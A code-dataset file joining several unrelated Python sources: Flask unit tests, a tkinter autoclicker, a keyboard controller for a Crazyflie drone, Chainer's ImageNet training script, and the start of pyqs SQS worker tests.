pass
else:
self.fail('expected exception')
else:
self.assert_equal(c.get('/').status_code, 500)
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in 'TESTING', 'PROPAGATE_EXCEPTIONS', 'DEBUG', None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
def test_max_content_length(self):
app = flask.Flask(__name__)
app.config['MAX_CONTENT_LENGTH'] = 64
@app.before_request
def always_first():
flask.request.form['myfile']
self.assert_(False)
@app.route('/accept', methods=['POST'])
def accept_file():
flask.request.form['myfile']
self.assert_(False)
@app.errorhandler(413)
def catcher(error):
return '42'
c = app.test_client()
rv = c.post('/accept', data={'myfile': 'foo' * 100})
self.assert_equal(rv.data, '42')
def test_url_processors(self):
app = flask.Flask(__name__)
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and \
app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
values.setdefault('lang_code', flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop('lang_code', None)
@app.route('/<lang_code>/')
def index():
return flask.url_for('about')
@app.route('/<lang_code>/about')
def about():
return flask.url_for('something_else')
@app.route('/foo')
def something_else():
return flask.url_for('about', lang_code='en')
c = app.test_client()
self.assert_equal(c.get('/de/').data, '/de/about')
self.assert_equal(c.get('/de/about').data, '/foo')
self.assert_equal(c.get('/foo').data, '/en/about')
def test_inject_blueprint_url_defaults(self):
app = flask.Flask(__name__)
bp = flask.Blueprint('foo.bar.baz', __name__,
template_folder='template')
@bp.url_defaults
def bp_defaults(endpoint, values):
values['page'] = 'login'
@bp.route('/<page>')
def view(page): pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults('foo.bar.baz.view', values)
expected = dict(page='login')
self.assert_equal(values, expected)
with app.test_request_context('/somepage'):
url = flask.url_for('foo.bar.baz.view')
expected = '/login'
self.assert_equal(url, expected)
def test_debug_mode_complains_after_first_request(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/')
def index():
return 'Awesome'
self.assert_(not app.got_first_request)
self.assert_equal(app.test_client().get('/').data, 'Awesome')
try:
@app.route('/foo')
def broken():
return 'Meh'
except AssertionError, e:
self.assert_('A setup function was called' in str(e))
else:
self.fail('Expected exception')
app.debug = False
@app.route('/foo')
def working():
return 'Meh'
self.assert_equal(app.test_client().get('/foo').data, 'Meh')
self.assert_(app.got_first_request)
def test_before_first_request_functions(self):
got = []
app = flask.Flask(__name__)
@app.before_first_request
def foo():
got.append(42)
c = app.test_client()
c.get('/')
self.assert_equal(got, [42])
c.get('/')
self.assert_equal(got, [42])
self.assert_(app.got_first_request)
def test_routing_redirect_debugging(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/', methods=['GET', 'POST'])
def foo():
return 'success'
with app.test_client() as c:
try:
c.post('/foo', data={})
except AssertionError, e:
self.assert_('http://localhost/foo/' in str(e))
self.assert_('Make sure to directly send your POST-request '
'to this URL' in str(e))
else:
self.fail('Expected exception')
rv = c.get('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, 'success')
app.debug = False
with app.test_client() as c:
rv = c.post('/foo', data={}, follow_redirects=True)
self.assert_equal(rv.data, 'success')
def test_route_decorator_custom_endpoint(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/foo/')
def foo():
return flask.request.endpoint
@app.route('/bar/', endpoint='bar')
def for_bar():
return flask.request.endpoint
@app.route('/bar/123', endpoint='123')
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for('foo') == '/foo/'
assert flask.url_for('bar') == '/bar/'
assert flask.url_for('123') == '/bar/123'
c = app.test_client()
self.assertEqual(c.get('/foo/').data, 'foo')
self.assertEqual(c.get('/bar/').data, 'bar')
self.assertEqual(c.get('/bar/123').data, '123')
def test_preserve_only_once(self):
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail')
def fail_func():
1/0
c = app.test_client()
for x in xrange(3):
with self.assert_raises(ZeroDivisionError):
c.get('/fail')
self.assert_(flask._request_ctx_stack.top is not None)
self.assert_(flask._app_ctx_stack.top is not None)
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
self.assert_(flask._request_ctx_stack.top is None)
self.assert_(flask._app_ctx_stack.top is None)
class ContextTestCase(FlaskTestCase):
def test_context_binding(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
@app.route('/meh')
def meh():
return flask.request.url
with app.test_request_context('/?name=World'):
self.assert_equal(index(), 'Hello World!')
with app.test_request_context('/meh'):
self.assert_equal(meh(), 'http://localhost/meh')
self.assert_(flask._request_ctx_stack.top is None)
def test_context_test(self):
app = flask.Flask(__name__)
self.assert_(not flask.request)
self.assert_(not flask.has_request_context())
ctx = app.test_request_context()
ctx.push()
try:
self.assert_(flask.request)
self.assert_(flask.has_request_context())
finally:
ctx.pop()
def test_manual_context_binding(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
ctx = app.test_request_context('/?name=World')
ctx.push()
self.assert_equal(index(), 'Hello World!')
ctx.pop()
try:
index()
except RuntimeError:
pass
else:
self.assert_(0, 'expected runtime error')
class SubdomainTestCase(FlaskTestCase):
def test_basic_support(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/')
def normal_index():
return 'normal index'
@app.route('/', subdomain='test')
def test_index():
return 'test index'
c = app.test_client()
rv = c.get('/', 'http://localhost/')
self.assert_equal(rv.data, 'normal index')
rv = c.get('/', 'http://test.localhost/')
self.assert_equal(rv.data, 'test index')
@emits_module_deprecation_warning
def test_module_static_path_subdomain(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'example.com'
from subdomaintestmodule import mod
app.register_module(mod)
c = app.test_client()
rv = c.get('/static/hello.txt', 'http://foo.example.com/')
self.assert_equal(rv.data.strip(), 'Hello Subdomain')
def test_subdomain_matching(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost/')
self.assert_equal(rv.data, 'index for mitsuhiko')
def test_subdomain_matching_with_ports(self):
app = flask.Flask(__name__)
app.config['SERVER_NAME'] = 'localhost:3000'
@app.route('/', subdomain='<user>')
def index(user):
return 'index for %s' % user
c = app.test_client()
rv = c.get('/', 'http://mitsuhiko.localhost:3000/')
self.assert_equal(rv.data, 'index for mitsuhiko')
@emits_module_deprecation_warning
def test_module_subdomain_support(self):
app = flask.Flask(__name__)
mod = flask.Module(__name__, 'test', subdomain='testing')
app.config['SERVER_NAME'] = 'localhost'
@mod.route('/test')
def test():
return 'Test'
@mod.route('/outside', subdomain='xtesting')
def bar():
return 'Outside'
app.register_module(mod)
c = app.test_client()
rv = c.get('/test', 'http://testing.localhost/')
self.assert_equal(rv.data, 'Test')
rv = c.get('/outside', 'http://xtesting.localhost/')
self.assert_equal(rv.data, 'Outside')
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(BasicFunctionalityTestCase))
suite.addTest(unittest.makeSuite(ContextTestCase))
suite.addTest(unittest.makeSuite(SubdomainTestCase))
return suite
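# A small sketch of running this module's suite directly with the standard
# unittest runner (the full Flask test suite normally aggregates it instead):
#
#   if __name__ == '__main__':
#       unittest.TextTestRunner(verbosity=2).run(suite())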
|
main.py
|
from tkinter import *
from tkinter import ttk, messagebox
import pyautogui as pa
import time, threading
from pynput import keyboard
class AutoClicker:
def __init__(self, h, m, s, ms, pos, times, w):
self.time = ms+s*1000+m*60000+h*60*60*1000
self.started = True
self.button = "left"
self.position = pos
self.times = times
self.window = w
def start(self):
while self.started and self.times != 0:
if self.position != None:
pa.click(button=self.button, x=self.position[0], y=self.position[1])
else:
pa.click(button=self.button)
if self.times > 0:
self.times -= 1
time.sleep(self.time/1000)
self.window.stop()
def stop(self):
self.started = False
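# Example (hypothetical values): AutoClicker(0, 0, 1, 500, None, 10, window)
# left-clicks 10 times at the current cursor position (pos=None), once every
# 1.5 s, since __init__ above folds h/m/s/ms into a single interval in
# milliseconds and start() sleeps for that interval between clicks.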
class Window:
def __init__(self):
self.tk = Tk()
self.tk.title("AutoClicker v1.0")
self.startKey = "c"
self.started = False
def draw_gui(self):
self.interval = LabelFrame(self.tk, text="Click interval")
self.interval.grid(column=0, row=0, columnspan=2, padx=5, pady=5, sticky="ew")
self.h = ttk.Spinbox(self.interval, from_=0, to=24, width=3)
self.h.set(0)
self.h.pack(side="left", pady=5, padx=5)
hL = Label(self.interval, text="hours,")
hL.pack(side="left")
self.m = ttk.Spinbox(self.interval, from_=0, to=59, width=3)
self.m.set(0)
self.m.pack(side="left")
mL = Label(self.interval, text="minutes,")
mL.pack(side="left")
self.s = ttk.Spinbox(self.interval, from_=0, to=59, width=3)
self.s.set(0)
self.s.pack(side="left")
sL = Label(self.interval, text="seconds,")
sL.pack(side="left")
self.ms = ttk.Spinbox(self.interval, from_=0, to=999, width=3)
self.ms.set(0)
self.ms.pack(side="left")
mmL = Label(self.interval, text="milliseconds")
mmL.pack(side="left")
def check_bind_start():
            def key_pressed(k):
                try:
                    # Temporarily flag "started" so the global start/stop
                    # listener ignores the key press used for rebinding.
                    self.started = True
                    self.startKey = k.char
                    self.started = False
                    return False  # a character key was captured; stop listening
                except AttributeError:
                    # Special keys (Shift, Ctrl, ...) have no .char; keep listening
                    self.started = False
with keyboard.Listener(on_press=key_pressed) as listener:
listener.join()
self.startBindL["text"] = "Start/Stop key: [%s]: " % self.startKey
self.config = LabelFrame(self.tk, text="Key bind")
self.startBindL = Label(self.config, text="Start/Stop key [%s]: " % self.startKey)
self.startBindL.pack(side="left", padx=3, pady=5)
startBindB = Button(self.config, text="Click to bind", command=check_bind_start)
startBindB.pack(side="left", padx=3, pady=5)
self.config.grid(row=1, column=0, padx=5, sticky="w")
self.times = LabelFrame(self.tk, text="Click repeat")
self.repeatType = BooleanVar()
self.repeatType.set(False)
r1 = Radiobutton(self.times, text="Repeat times: ", variable=self.repeatType, value=True)
r2 = Radiobutton(self.times, text="Repeat until stopped", variable=self.repeatType, value=False)
self.timesEntry = Entry(self.times, width=3)
r1.grid(row=0, column=0, sticky="w", padx=3)
self.timesEntry.grid(row=0, sticky="w", column=1, padx=3)
r2.grid(row=1, column=0, sticky="w", padx=3, columnspan=2)
self.times.grid(row=2, column=0, padx=5, sticky = "w")
self.mouseSetting = LabelFrame(self.tk, text="Mouse setting")
mouseButtonL = Label(self.mouseSetting, text="Mouse button: ")
mouseButtonL.pack(padx=3, pady=3)
self.buttonSelect = ttk.Combobox(self.mouseSetting, values=["left", "right"], state="readonly")
self.buttonSelect.set("left")
self.buttonSelect.pack(padx=3, pady=3)
frame = Frame(self.mouseSetting)
x = Label(frame, text="X:", state="disabled")
y = Label(frame, text="Y:", state="disabled")
self.xNum = Entry(frame, width=4, state="disabled")
self.yNum = Entry(frame, width=4, state="disabled")
        def onclick():
            state = "normal" if self.var.get() else "disabled"
            x["state"] = state
            y["state"] = state
            self.xNum["state"] = state
            self.yNum["state"] = state
self.var = BooleanVar()
coordsBox = Checkbutton(frame, variable=self.var, text="Specific coords", command=onclick)
x.grid(row=1, column=0)
y.grid(row=2, column=0)
self.xNum.grid(row=1, column=1)
self.yNum.grid(row=2, column=1)
coordsBox.grid(row=0, column=0, columnspan=2)
frame.pack(padx=3, pady=3)
self.mouseSetting.grid(row=1, column=1, padx=5, sticky="e", rowspan=2)
self.startB = Button(self.tk, text="Start", command=self.start)
self.startB.grid(row=3, column=0)
self.stopB = Button(self.tk, text="Stop", command=self.stop, state="disabled")
        self.stopB.grid(row=3, column=1, pady=10)
Label(self.tk, text="OrangoMango - https://orangomango.github.io").grid(row=4, column=0, pady=2, columnspan=2)
def handleStartClick():
def key_pressed(k):
try:
if k.char == self.startKey.lower():
if self.started:
self.stop()
else:
self.start()
except AttributeError:
pass
with keyboard.Listener(on_press=key_pressed) as listener:
listener.join()
clickThread = threading.Thread(target=handleStartClick)
clickThread.start()
def start(self):
        self.started = True
try:
hours = int(self.h.get())
minutes = int(self.m.get())
seconds = int(self.s.get())
milliseconds = int(self.ms.get())
except ValueError:
messagebox.showerror("Error", "Please check your values!")
return
if self.var.get():
try:
xC = int(self.xNum.get())
yC = int(self.yNum.get())
pos = (xC, yC)
except ValueError:
messagebox.showerror("Error", "Please check your values!")
return
else:
pos = None
if self.repeatType.get():
try:
times = int(self.timesEntry.get())
except ValueError:
messagebox.showerror("Error", "Please check your values!")
return
else:
times = -1
self.startB.configure(state="disabled")
self.stopB.configure(state="normal");
self.autoclicker = AutoClicker(hours, minutes, seconds, milliseconds, pos, times, self)
self.autoclicker.button = self.buttonSelect.get()
startT = threading.Thread(target=self.autoclicker.start)
startT.start()
def stop(self):
self.started = False
self.autoclicker.stop()
self.startB.configure(state="normal")
self.stopB.configure(state="disabled");
def mainloop(self):
self.tk.mainloop()
if __name__ == "__main__":
window = Window()
    window.draw_gui()
window.mainloop()
|
key_control.py
|
import logging
import time
import signal
import sys
import pygame
import threading
import cflib.crtp
from cflib.crazyflie.syncCrazyflie import SyncCrazyflie
from cflib.crazyflie.log import LogConfig
URI = 'radio://0/80/250K'
def signal_handler(signal, frame):
    print("**** Crazyflie Stopping ****")
    # landing sequence: ramp the hover setpoint down over one second
    if cf is not None:
        for y in range(10):
            cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
            time.sleep(0.1)
    global done
    done = True
    close_terminate()
    sys.exit(0)
def close_terminate():
try:
cf.commander.send_stop_setpoint()
except Exception as e:
print("Error in stopping: %s" % str(e))
signal.signal(signal.SIGINT, signal_handler)
XY_VEL = 0.25
YAW_RATE = 40
Z_STEP = 0.02
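# These constants feed cf.commander.send_hover_setpoint(vx, vy, yawrate, z)
# in main_thread() below: XY_VEL is a lateral velocity in m/s, YAW_RATE a
# rotation rate in deg/s, and Z_STEP the altitude increment in metres applied
# once per 0.1 s control tick.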
# Axis state flags set by the key handlers below:
# -1 = first direction (up / left / forward), 0 = neutral, 1 = second direction (down / right / back)
upDown = 0
leftRight = 0
forwardBack = 0
yawLeftRight = 0
done = True
active = []
WIDTH = 200
HEIGHT = 100
# runs key checking
def on_key_down(key):
global upDown
global leftRight
global forwardBack
global yawLeftRight
if key in active:
return
# print("PRESSED " + str(key))
active.append(key)
if key == key.W:
# print('Alt Up')
upDown = -1
elif key == key.S:
# print('Alt Down')
upDown = 1
elif key == key.A:
# print('Yaw Left')
yawLeftRight = -1
elif key == key.D:
# print('Yaw Right')
yawLeftRight = 1
elif key == key.UP:
# print('Pitch Forward')
forwardBack = -1
elif key == key.DOWN:
# print('Pitch Back')
forwardBack = 1
elif key == key.LEFT:
# print('Roll Left')
leftRight = -1
elif key == key.RIGHT:
# print('Roll Right')
leftRight = 1
def on_key_up(key):
global upDown
global leftRight
global forwardBack
global yawLeftRight
if key in active:
active.remove(key)
# print("RELEASED " + str(key))
#releasing
if key == key.W or key == key.S:
# print('Release Alt')
upDown = 0
elif key == key.A or key == key.D:
# print('Release Yaw')
yawLeftRight = 0
elif key == key.UP or key == key.DOWN:
# print('Release Pitch')
forwardBack = 0
elif key == key.LEFT or key == key.RIGHT:
# print('Release Roll')
leftRight = 0
cf = None
def main_thread():
ALT = 0.4
VX = 0
VY = 0
YAW = 0
global cf
print("STARTING MAIN")
# Initialize the low-level drivers (don't list the debug drivers)
cflib.crtp.init_drivers(enable_debug_driver=False)
with SyncCrazyflie(URI) as scf:
cf = scf.cf
cf.param.set_value('kalman.resetEstimation', '1')
time.sleep(0.1)
cf.param.set_value('kalman.resetEstimation', '0')
time.sleep(1.5)
print("--------- Initiating Sequence ---------")
for y in range(10):
cf.commander.send_hover_setpoint(0, 0, 0, y * ALT / 10)
time.sleep(0.1)
print("**** Crazyflie in the air! ****")
global done
done = False
while not done:
#ROLL BLOCK
if leftRight == -1:
#left
VY = XY_VEL
elif leftRight == 1:
#right
VY = -XY_VEL
else:
VY = 0
#FORWARD BLOCK
if forwardBack == -1:
#forward
VX = XY_VEL
elif forwardBack == 1:
#back
VX = -XY_VEL
else:
VX = 0
#ALT BLOCK
if upDown == -1:
#up
ALT += Z_STEP
elif upDown == 1:
#down
ALT -= Z_STEP
if ALT < 0.4:
ALT = 0.4
#YAW BLOCK
if yawLeftRight == -1:
#left
YAW = -YAW_RATE
elif yawLeftRight == 1:
#right
YAW = YAW_RATE
else:
YAW = 0
cf.commander.send_hover_setpoint(VX, VY, YAW, ALT)
print("VALS: (VX %.2f, VY %.2f, YAW %.2f, ALT %.2f" % (VX, VY, YAW, ALT))
time.sleep(0.1)
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
# time.sleep(0.1)
#ENDING
#close_terminate()
reader = threading.Thread(target=main_thread)
reader.start()
# done = False
print("STARTING")
# pygame.init()
# pygame.display.set_mode((200, 100))
# while not done:
# for event in pygame.event.get():
# if event.type == pygame.QUIT:
# sys.exit()
# # setting 4 axis
# if event.type == pygame.KEYDOWN:
# if event.key == pygame.K_w:
# print('Alt Up')
# upDown = -1
# elif event.key == pygame.K_s:
# print('Alt Down')
# upDown = 1
# elif event.key == pygame.K_a:
# print('Yaw Left')
# yawLeftRight = -1
# elif event.key == pygame.K_d:
# print('Yaw Right')
# yawLeftRight = 1
# elif event.key == pygame.K_UP:
# print('Pitch Forward')
# forwardBack = -1
# elif event.key == pygame.K_DOWN:
# print('Pitch Back')
# forwardBack = -1
# elif event.key == pygame.K_LEFT:
# print('Roll Left')
# leftRight = -1
# elif event.key == pygame.K_RIGHT:
# print('Roll Right')
# leftRight = 1
# #releasing
# if event.type == pygame.KEYUP:
# if event.key == pygame.K_w or event.key == pygame.K_s:
# print('Release Alt')
# upDown = 0
# elif event.key == pygame.K_a or event.key == pygame.K_d:
# print('Release Yaw')
# yawLeftRight = 0
# elif event.key == pygame.K_UP or event.key == pygame.K_DOWN:
# print('Release Pitch')
# forwardBack = 0
# elif event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
# print('Release Roll')
# leftRight = 0
# #wait til crazy flie is in the air
# while done:
# s = 0
# main = Tk()
# frame = Frame(main, width=200, height=100)
# main.bind_all('<KeyPress>', key_press)
# main.bind_all('<KeyRelease>', key_release)
# frame.pack()
# main.mainloop()
# done = True
# # gui.join()
# print("Direction Reader Closed")
# def signal_handler(signal, frame):
# print("**** Crazyflie Stopping ****")
# #land seq
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
# time.sleep(0.1)
# close_terminate();
# sys.exit(0)
# def close_terminate():
# try:
# cf.commander.send_stop_setpoint()
# log_bat.stop()
# logFile.close()
# except Exception as e:
# print("Error in stopping log: %s" % str(e))
# signal.signal(signal.SIGINT, signal_handler)
# URI = 'radio://0/80/250K'
# # Only output errors from the logging framework
# logging.basicConfig(level=logging.ERROR)
# #assume full to start
# vbat = 4.0
# #somewhat arbitrary
# V_THRESH = 3.13
# def received_bat_data(timestamp, data, logconf):
# global vbat
# #print('[%d][%s]: %f' % (timestamp, logconf.name, float(data['pm.vbat'])))
# vbat = float(data['pm.vbat'])
# def error_bat_data(logconf, msg):
# print('Error when logging %s: %s' % (logconf.name, msg))
# if __name__ == '__main__':
# # Initialize the low-level drivers (don't list the debug drivers)
# cflib.crtp.init_drivers(enable_debug_driver=False)
# with SyncCrazyflie(URI) as scf:
# cf = scf.cf
# cf.param.set_value('kalman.resetEstimation', '1')
# time.sleep(0.1)
# cf.param.set_value('kalman.resetEstimation', '0')
# time.sleep(1.5)
# log_bat = LogConfig(name='Battery', period_in_ms=100)
# log_bat.add_variable('pm.vbat', 'float')
# logFile = open("bat.txt","w+")
# try:
# cf.log.add_config(log_bat)
# # This callback will receive the data
# log_bat.data_received_cb.add_callback(received_bat_data)
# # This callback will be called on errors
# log_bat.error_cb.add_callback(error_bat_data)
# # Start the logging
# log_bat.start()
# except KeyError as e:
# print('Could not start log configuration,'
# '{} not found in TOC'.format(str(e)))
# except AttributeError:
# print('Could not add Battery log config, bad configuration.')
# print("--------- Initiating Sequence ---------")
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, y / 25)
# time.sleep(0.1)
# print("**** Crazyflie in the air! ****")
# while vbat > V_THRESH:
# cf.commander.send_hover_setpoint(0, 0, 0, 10 / 25)
# logFile.write(str(vbat) + "\r\n") # write battery voltage to file
# time.sleep(0.05)
# print("**** Low battery detected -- Landing ****")
# for y in range(10):
# cf.commander.send_hover_setpoint(0, 0, 0, (10-y) / 25)
# time.sleep(0.1)
# #ENDING
# close_terminate()
|
train_imagenet.py
|
#!/usr/bin/env python
"""Example code of learning a large scale convnet from ILSVRC2012 dataset.
Prerequisite: To run this example, crop the center of ILSVRC2012 training and
validation images and scale them to 256x256, and make two lists of space-
separated CSV whose first column is full path to image and second column is
zero-origin label (this format is same as that used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import os
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
import chainer
from chainer import computational_graph
from chainer import cuda
from chainer import optimizers
from chainer import serializers
parser = argparse.ArgumentParser(
description='Learning convnet from ILSVRC2012 dataset')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alex, alexbn, googlenet, googlenetbn)')
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--root', '-r', default='.',
help='Root directory path of image files')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
parser.add_argument('--outstate', '-s', default='state',
help='Path to save optimizer state on each validation')
parser.add_argument('--initmodel', default='',
help='Initialize the model from given file')
parser.add_argument('--resume', default='',
help='Resume the optimization from snapshot')
args = parser.parse_args()
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
assert 50000 % args.val_batchsize == 0
def load_image_list(path, root):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((os.path.join(root, pair[0]), np.int32(pair[1])))
return tuples
# Prepare dataset
train_list = load_image_list(args.train, args.root)
val_list = load_image_list(args.val, args.root)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alex':
import alex
model = alex.Alex()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9)
optimizer.setup(model)
# Init/Resume
if args.initmodel:
print('Load model from', args.initmodel)
serializers.load_hdf5(args.initmodel, model)
if args.resume:
print('Load optimizer state from', args.resume)
serializers.load_hdf5(args.resume, optimizer)
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
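# Queue protocol (as implemented below): feed_data() puts the markers
# 'train' / 'val' / 'end' or (x_batch, y_batch) tuples on data_q; train_loop()
# echoes each marker to res_q and otherwise puts (loss, accuracy) pairs,
# which log_result() consumes.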
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
# Data loading routine
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
        top = left = cropwidth // 2
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
def feed_data():
# Data feeder
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % 1000 == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
def log_result():
# Logger
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 1000 == 0:
mean_loss = train_cur_loss / 1000
mean_error = 1 - train_cur_accuracy / 1000
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count / args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
def train_loop():
# Trainer
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
model.train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
serializers.save_hdf5(args.out, model)
serializers.save_hdf5(args.outstate, optimizer)
model.train = False
continue
volatile = 'off' if model.train else 'on'
x = chainer.Variable(xp.asarray(inp[0]), volatile=volatile)
t = chainer.Variable(xp.asarray(inp[1]), volatile=volatile)
if model.train:
optimizer.update(model, x, t)
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(computational_graph.build_computational_graph(
(model.loss,)).dump())
print('generated graph', file=sys.stderr)
graph_generated = True
else:
model(x, t)
res_q.put((float(model.loss.data), float(model.accuracy.data)))
del x, t
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
serializers.save_hdf5(args.out, model)
serializers.save_hdf5(args.outstate, optimizer)
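# Example invocation (hypothetical paths; see the argparse options above):
#   python train_imagenet.py train_list.txt val_list.txt -m mean.npy -a nin -g 0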
|
test_worker.py
|
import json
import logging
import time
import threading
from multiprocessing import Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
import boto3
from moto import mock_sqs
from mock import patch, Mock
from pyqs.worker import (
ManagerWorker, ReadWorker, ProcessWorker, BaseWorker,
MESSAGE_DOWNLOAD_BATCH_SIZE,
)
from pyqs.utils import decode_message
from tests.tasks import task_results
from tests.utils import MockLoggingHandler
BATCHSIZE = 10
INTERVAL = 0.1
@mock_sqs
def test_worker_fills_internal_queue():
"""
Test read workers fill internal queue
"""
conn = boto3.client('sqs', region_name='us-east-1')
queue_url = conn.create_queue(QueueName="tester")['QueueUrl']
message = json.dumps({
'task': 'tests.tasks.index_incrementer',
'args': [],
'kwargs': {
'message': 'Test message',
},
})
conn.send_message(QueueUrl=queue_url, MessageBody=message)
internal_queue = Queue()
worker = ReadWorker(queue_url, internal_queue, BATCHSIZE, parent_id=1)
worker.read_message()
packed_message = internal_queue.get(timeout=1)
found_message_body = decode_message(packed_message['message'])
found_message_body.should.equal({
'task': 'tests.tasks.index_incrementer',
'args': [],
